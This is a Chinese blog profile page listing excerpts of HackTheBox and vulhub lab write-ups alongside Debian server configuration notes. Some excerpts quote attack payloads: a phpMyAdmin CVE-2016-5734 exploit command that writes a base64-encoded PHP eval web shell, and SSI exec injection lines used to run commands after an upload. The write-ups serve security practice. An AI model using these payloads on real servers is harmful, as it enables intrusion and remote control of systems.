自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(23)
  • 收藏
  • 关注

原创 关于debian的一些国赛资料服务配置

由于问我的人比较多我吧我收藏的关于debian的服务搭建的一些书签放在了云盘大家有需要可以下载看看,「debian书签」,点击链接保存,或者复制本段内容,打开「阿里云盘」APP ,无需下载极速在线查看,视频原画倍速播放。链接:https://www.aliyundrive.com/s/AR9vZW7Gpw9...

2021-12-08 09:16:46 1028 7

原创 hack the box explore

今天来继续打靶,hack the box的explore拿到目标先扫描么,看看开了那些端口和服务碰到个没开80端口的服务器EnterNet/IP:设备可以用户数据报协议(UDP)的隐式报文传送基于IO的资料,用户传输控制协议(TCP)显示报文上传和下参数,设定值,程式 ,用户主站的轮询从站周期性的更新或是改变状态COS,方便主站监控从站的状态,讯息会使用UDP的报文发送出去特性: EnterNet/IP工业以太网组成的系统具有兼容性和互操作性,资源共享能力强和传输距离远,传输速率高

2021-08-27 16:52:40 443

原创 hack the box cap

今天来继续打靶场hack the box 的 Cap靶场首先用nmap扫描靶机开放了那些端口和服务靶机开放了21,22,80端口,现在就不尝试爆破了直接访问web页面收集信息,再用whatweb来识别CMS的版本和型号看着像一个网管平台,在访问安全快照页面时发现了http://10.10.10.245/data/32,data后面的次数会增加,而这个页面是来备份数据流量的,也可以下载下来,我们访问最开始的页面可能就会拿到管理员登陆时的流量保存数据pacp,用wireshark

2021-08-27 16:37:34 222

原创 HackTheBox-Knife

今天我们来打hack the box里面的靶场1,首先连接openvpn实现访问到靶机ping一下靶机地址测试网络连通2,nmap来扫描服务器开了什么端口从这里可以看出靶机开了22和80端口,随手试了几个ssh的弱口令没啥用,只能从80端口入手了,先访问网站首页没发现可以利用的地方,再用dirsearch扫一波目录扫描出来的目录访问之后没啥作用3,我们来识别一波CMS用kali的whatweb来识别一波这里看到了X-Powered-By[PHP/8.1.0-dev]不同寻常百度

2021-08-26 16:01:04 295

原创 红日靶场二

描述:红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要AccessToken利用、WMI利用、域漏洞利用SMB relay,EWSrelay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/SidHistory/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSXBypass UACWindows系统NTLM获取(理论知识:Windows认证)Access Token利用(MSSQL利用).

2021-08-02 10:12:32 4557 2

原创 WeblogicScan-master

项目地址 https://github.com/rabbitmask/WeblogicScan最近搞个靶场需要用到这个工具,下载之后直接运行惠报错在和群里大佬讨论过之后解决了这个问题在这个文件里面调用了ua,看着是在国外网站请求的随机ua所以在下图所示的文件里面注释掉类和实例化函数,在headers里面添加一个ua就可以了,当然也可以自己写一个随机ua的函数实现他的功能...

2021-07-29 13:59:48 825

原创 红日靶场一

一、环境搭建 1.环境搭建测试 2.信息收集二、漏洞利用 3.漏洞搜索与利用 4.后台Getshell上传技巧 5.系统信息收集 6.主机密码收集三、内网搜集 7.内网--继续信息收集 8.内网攻击姿势--信息泄露 9.内网攻击姿势-MS08-067 10.内网攻击姿势-SMB远程桌面口令猜测 11.内网攻击姿势-Oracle数据库TNS服务漏洞 12.内网攻击姿势-RPC DCOM服务漏洞四、横.

2021-07-28 10:10:33 2312

原创 vulhub-Nexus中CVE-2019-7238

成因* Nexus Repository Manager是Sonatype公司的一个产品,简称NXRM,它是一款通用的软件包仓库管理服务,在Nexus Repository Manager 3中由于存在访问控制措施的不足,未授权的用户可以利用该缺陷构造特定的请求在服务器上执行Java代码,从而达到远程代码执行的目的。*影响范围:Nexus Repository Manager OSS/Pro 3.6.2-3.14.0首先访问这个页面,登录admin:admin123,随便传个东西传好之后呢,用C

2021-07-23 16:39:03 348 2

原创 vulhub-phpmyadmin中CVE-2016-5734

CVE-2016-5734远程代码执行漏洞影响版的本phpmyadmin4.3.0-4.6.2看到phpmyadmin登陆页面爆破拿到用户名密码root,root利用poc进行命令执行写入一句话进行菜刀连接python27 CVE-2016-5734.py -u root -p "root" http://xx.xx.xx.xx:8080 -c "file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY21kX

2021-07-23 09:15:37 537 3

原创 vulhub-httpd中ssi-rce

漏洞原理在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个后缀为shtml文件并利用<!--#exec cmd="id" -->语法执行任意命令。第一步访问没有主页面利用目录扫描工具扫出目录测试上传文件限制很显然不能上传.php文件可已上传一个.shtml文件来执行命令文件里面是`<!--#exec cmd="whoami" -->`命令执行成功!然后开始进行菜刀连接在1

2021-07-22 15:00:52 606 4

原创 vulhub-httpd中CVE-2017-15715

Apache HTTPD 换行解析漏洞(CVE-2017-15715)漏洞描述Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,shell.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。## 影响版本Apache HTTPd 2.4.0~2.4.29复现直接上传不了利用换行解析漏洞...

2021-07-22 14:35:49 302 4

原创 vulhub-httpd中apache_parsing_vulnerability

Apache HTTPD 多后缀解析漏洞漏洞描述在对漏洞介绍之前我们先对httpd.conf文件进行一个介绍,httpd.conf是apache的一个总配置文件,在该文件中,有很多对apache解析网页参数的设置,我们挑三个来介绍AddType:为特定后缀的文件指定MIME类型AddLanguage:一个HTML文档可以同时具备多个语言的版本,如对于file1.html文档可以具备file1.html.en、file1.html.cn等不同的版本,每个语言后缀可以使用AddLanguage进行定义

2021-07-22 10:28:25 933 2

原创 vulhub在centos7中的搭建

第一步换源 mv /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/CentOS-Base.repo.backup#备份 wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.aliyun.com/repo/Centos-7.repo#下载阿里源 yum clean all#清理缓存 yum makecache#生成缓存 yum update#升级软件第二步下载doc

2021-07-22 09:50:00 563 2

原创 debian10单臂路由和子接口配置

需求:开启路由转发,为当前实验环境提供路由功能,配置单臂路由实现内部客户端和服务器之间的通信。开启路由转发:root@routersrv:/ vim /etc/sysctl.conf 添加:net.ipv4.ip_forward=1配置路由和子网接口:auto ens33 激活接口iface ens33 inet static 使用静态ipaddress 81.6.63.254 指定ipnetmask 255.255.255.0 指定子网掩码network 81.6.63.0

2021-06-16 16:11:21 1617 2

原创 debian10ssh配置用户限制,日志等

需求:工作端口为2021;只允许用户user01,密码ChinaSkill21登录到router。其他用户(包括root)不能登录,创建一个新用户,新用户可以从本地登录,但不能从ssh远程登录。通过ssh登录尝试登录到RouterSrv,一分钟内最多尝试登录的次数为3次,超过后禁止该客户端网络地址访问ssh服务。记录用户登录的日志到/var/log/ssh.log,日志内容要包含:源地址,目标地址,协议,源端口,目标端口。改端口:root@routersrv:~ vim /etc/ssh/s

2021-06-07 10:34:30 3027 10

原创 debian10 web服务-nginx

需求:安装nginx软件包; 配置文件名为ispweb.conf,放置在/etc/nginx/conf.d/目录下;网站根目录为/mut/crypt(目录不存在需创建); 启用FastCGI功能,让nginx能够解析php请求;index.php内容使用Welcome to 2020 Computer Network Application contest!安装nginxroot@IspSrv: apt-get install -y nginx创建配置文件root@IspSrv: vim

2021-06-04 18:30:18 1457 12

原创 debian10RAID5和磁盘加密

需求 - 在虚拟机上,新建四块大小为10GB的虚拟硬盘,挂载到系统上; - 创建raid 5 md0组,模式为三个磁盘,一个为热备; - 挂载md0 到系统中创建的/backup文件夹下; 系统启动自动挂载md0 RAID磁盘; - 创建一块新的磁盘,对该卷进行磁盘加密,解锁密码为“CSK2021!”,映射到/dev/mapper/crypt - 分区上;格式化成ext4分区;挂载到/mut/crypt目录;配置开机自动挂载;添加虚拟机磁盘使系统加载磁盘root@IspSrv: ech

2021-06-04 15:23:41 1438 2

原创 debian10Chrony配置

需求: - 安装chrony,提供时间同步。 - 在AppSrv和StorageSrv创建CRON计划任务,每隔五分钟进行一次时间同步。 - ip:81.6.63.100安装Chrony:apt-get install -y chrony备份配置文件:mv /etc/chrony/chrony.conf /etc/chrony/chrony.conf.bak修改配置文件:root@IspSrv: vim /etc/chrony/chrony.conf server 服务器ip

2021-06-03 10:49:34 1358

原创 debian10DNS(bind9)主服务器配置

需求: - 安装BIND9; 配置为DNS根域服务器; - 其他未知域名解析,统一解析为该本机IP; - 创建正向区域“kill.com”; - 类型为Slave; - 主服务器为“AppSrv”。 - ip:81.6.63.100/etc/bind/目录下的主要文件说明: - named.conf 设置一般的named参数,指向该服务器使用的域数据库的信息 - named.conf.options 全局选项 - db.root 根服务器指向文件, 由Internet NIC创建和

2021-06-03 10:09:28 4705 7

原创 debian10修改静态ip和双网卡

需求: - ip:81.6.63.100 - 网卡:ens33配置网卡vim /etc/networking/interfaces 添加: auto ens33 iface ens33 inet static address 81.6.63.100 netmask 255.255.255.0 gateway 81.6.63.254重启网卡:systemctl restart networking查看ip地址配置:ip add大功告成!...

2021-06-03 09:29:53 1834

原创 bebian10主机名,FQDN修改

需求: - 完全限定域名:appsrv.chinaskills.cn - 主机名:appsrv主机名修改vim /etc/hostname appsrvFQDN修改vim /etc/hosts 添加一行: 81.6.63.100 appsrv.kill.com appsrv 本机ip FQDN 主机名

2021-06-03 09:25:14 975

原创 debian10静态源(离线iso)配置

debian10静态源(离线iso)配置- 需求: - 无网络情况下安装服务虚拟机添加光盘镜像: - 按照CD/DVD 后面的数字以此添加debian-10.9.0-i386-DVD-(1,2,3).iso镜像挂载镜像:- 右击光盘图标挂载iso镜像自动添加源:apt-cdrom add添加软件源由于后面的 buster contrib main记不住,可以抄写apt-cdrom add自动生成的源地址,抄完就可以注释掉自动生成的源地址了vim /etc/apt/sour

2021-06-03 09:14:27 1195 4

原创 Dabian10-DHCP服务的搭建

Dabian10-DHCP服务的搭建 - 需求: - 为OutsideCli客户端网络分配地址,地址池范围:81.6.63.110-81.6.63.190/24 - 域名解析服务器:按照实际需求配置DNS服务器地址选项 - 网关:按照实际需求配置网关地址选项安装dhcp服务:apt-get install -y isc-dhcp-server配置静态IP地址:cat /etc/network/interfaces 添加: auto ens33 iface ens33 i

2021-06-03 08:49:31 1089

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除